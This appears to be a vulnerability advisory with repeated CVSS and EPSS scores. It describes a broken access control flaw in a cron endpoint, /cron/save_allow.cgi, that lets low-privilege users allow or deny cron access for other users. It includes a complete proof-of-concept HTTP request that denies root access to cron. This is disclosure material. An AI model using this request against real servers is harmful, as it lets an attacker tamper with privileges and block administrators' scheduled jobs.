8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
5.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:N/I:P/A:P
0.002 Low
EPSS
Percentile
52.4%
The /cron/save_allow.cgi
endpoint is accessible to any authenticated low privilege users resulting in controlling user access to cron jobs. They could allow and deny other users access to cron jobs affecting the Scheduled Cron Jobs module.
GET http://{HOST}/cron/save_allow.cgi
~
*** This example request to deny root to access cron.
GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1
Host: jumphost:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-no-links: 1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: save_allow.cgi
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://jumphost:10000/cron/edit_allow.cgi?xnavigation=1
Cookie: redirect=1; testing=1; sid=092a4f34132757770ba9c9c353760197
This vulnerability is capable of modifying or restricting access to a system function outside the user’s limits.
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
5.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:N/I:P/A:P
0.002 Low
EPSS
Percentile
52.4%